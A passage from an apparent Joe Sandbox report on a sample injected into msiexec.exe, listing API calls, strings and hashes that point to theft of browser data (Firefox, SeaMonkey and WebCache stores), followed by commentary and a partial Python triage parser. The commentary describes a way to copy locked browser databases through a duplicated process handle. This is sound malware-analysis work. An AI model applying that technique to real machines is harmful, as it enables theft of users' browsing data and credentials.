  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 00403F6B
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
• String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
• API String ID: 1829478387-2068335096
• Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
• Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
• Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
• Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A

APIs
• memset.MSVCRT ref: 00403FE1
• memset.MSVCRT ref: 00403FF6
• memset.MSVCRT ref: 0040400B
• memset.MSVCRT ref: 00404020
• memset.MSVCRT ref: 00404035
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 004040FC
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                                                                                                                          • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                                          • API String ID: 1829478387-3369679110
                                                                                                                                                                                                          • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                          • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                          • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                                          • API String ID: 3510742995-2641926074
                                                                                                                                                                                                          • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                          • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                                          • free.MSVCRT ref: 0041848B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateErrorFileLastfree
                                                                                                                                                                                                          • String ID: |A
                                                                                                                                                                                                          • API String ID: 981974120-1717621600
                                                                                                                                                                                                          • Opcode ID: 51ca5a02fc44f8a5d6c80fe755b484a3b8e8795a5c0060307af42e5ba884e769
                                                                                                                                                                                                          • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51ca5a02fc44f8a5d6c80fe755b484a3b8e8795a5c0060307af42e5ba884e769
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                            • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                            • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                          • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                                                          • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                                                          • String ID: $0.@
                                                                                                                                                                                                          • API String ID: 2758756878-1896041820
                                                                                                                                                                                                          • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                          • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2941347001-0
                                                                                                                                                                                                          • Opcode ID: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                                                                                                                                                          • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                            • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                                            • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memsetwcscat$wcscpywcslen
                                                                                                                                                                                                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                                          • API String ID: 2489821370-1174173950
                                                                                                                                                                                                          • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                          • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                                                          APIs
• memset.MSVCRT ref: 0040A824
• GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
• wcscpy.MSVCRT ref: 0040A854
• wcscat.MSVCRT ref: 0040A86A
• LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
• LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID:
• API String ID: 669240632-0
APIs
• wcschr.MSVCRT ref: 00414458
• _snwprintf.MSVCRT ref: 0041447D
• WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
• GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
Strings
Similarity
• API ID: PrivateProfileString$Write_snwprintfwcschr
• String ID: "%s"
• API String ID: 1343145685-3297466227
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
• GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
• GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
Strings
Similarity
• API ID: AddressHandleModuleProcProcessTimes
• String ID: GetProcessTimes$kernel32.dll
• API String ID: 1714573020-3385500049
APIs
• memset.MSVCRT ref: 004087D6
  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
• memset.MSVCRT ref: 00408828
• memset.MSVCRT ref: 00408840
• memset.MSVCRT ref: 00408858
• memset.MSVCRT ref: 00408870
• memset.MSVCRT ref: 00408888
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
Similarity
• API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
• String ID:
• API String ID: 2911713577-0
APIs
• memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
• memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
• memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
Strings
Similarity
• API ID: memcmp
• String ID: @ $SQLite format 3
• API String ID: 1475443563-3708268960
APIs
Strings
Similarity
• API ID: _wcsicmpqsort
• String ID: /nosort$/sort
• API String ID: 1579243037-1578091866
APIs
• memset.MSVCRT ref: 0040E60F
• memset.MSVCRT ref: 0040E629
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
Strings
• Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
• Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
Similarity
• API ID: memsetwcslen$AttributesFilewcscatwcscpy
• String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
• API String ID: 3354267031-2114579845
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                          • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                                          • API String ID: 2221118986-1725073988
                                                                                                                                                                                                          • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                          • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                          • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$memcmp
                                                                                                                                                                                                          • String ID: $$8
                                                                                                                                                                                                          • API String ID: 2808797137-435121686
                                                                                                                                                                                                          • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                          • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                            • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                            • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                            • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                            • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                            • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                            • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                            • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                            • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                          • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                                                            • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                            • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                            • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75082EE0), ref: 0040E3EC
                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                                                                            • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                            • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                            • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1979745280-0
                                                                                                                                                                                                          • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                          • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                            • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                            • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                          • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                                          • free.MSVCRT ref: 00418803
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1355100292-0
                                                                                                                                                                                                          • Opcode ID: d2c930e6252e89cba164dd291f6fd6a93c7c4142cb300574fab5a2c635c3ca3b
                                                                                                                                                                                                          • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2c930e6252e89cba164dd291f6fd6a93c7c4142cb300574fab5a2c635c3ca3b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                          • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                            • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProcVersionmemsetwcscpy
                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                          • API String ID: 4182280571-2036018995
                                                                                                                                                                                                          • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                                          • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
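The records above are Joe Sandbox's per-function output for the image injected into msiexec.exe: an API list (with "Part of subcall function" lines), a Strings list with xrefs, the memory-dump source, and a Similarity block carrying the Opcode ID and the opcode/instruction fuzzy hashes. Two of them are worth pulling out automatically: the function whose subcall 0040E01E opens another process, duplicates a handle out of it, maps it and writes the contents to a new file (the way a locked browser database is copied without touching the file lock), and the functions whose strings name the WebCacheV01.dat / WebCacheV24.dat stores or the Shell Folders registry key. The Python below is an added example, not part of this report and not Joe Sandbox tooling: it parses records in this layout (including a record cut off at a page boundary, as the first one on this page is) and applies two triage heuristics of my own. The sample input is a condensed, constructed copy of records from this page; the API set used for the locked-file-copy pattern and the store-marker strings are assumptions chosen for illustration.

```python
"""Parse Joe Sandbox per-function records and triage them by the API pattern each function shows."""
import re

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# API line: optional "Part of subcall function XXXXXXXX: ", then "name.MODULE",
# optional "(args)", then ", ref: XXXXXXXX" (just " ref: " when no args were printed).
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
# Strings line: "<text>, xrefs: XXXXXXXX[, XXXXXXXX ...]"
STR_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<xrefs>[0-9A-F]{8}(?:, [0-9A-F]{8})*)$")

def parse_records(text):
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()  # the report copy is heavily indented
        if line in SECTION_HEADERS:
            # "APIs" opens a record; any other header seen before the first
            # "APIs" belongs to a record that was cut off at the page boundary.
            if line == "APIs" or rec is None:
                rec = {"partial": line != "APIs", "apis": [], "strings": [], "source": "", "similarity": {}}
                records.append(rec)
            section = line
            continue
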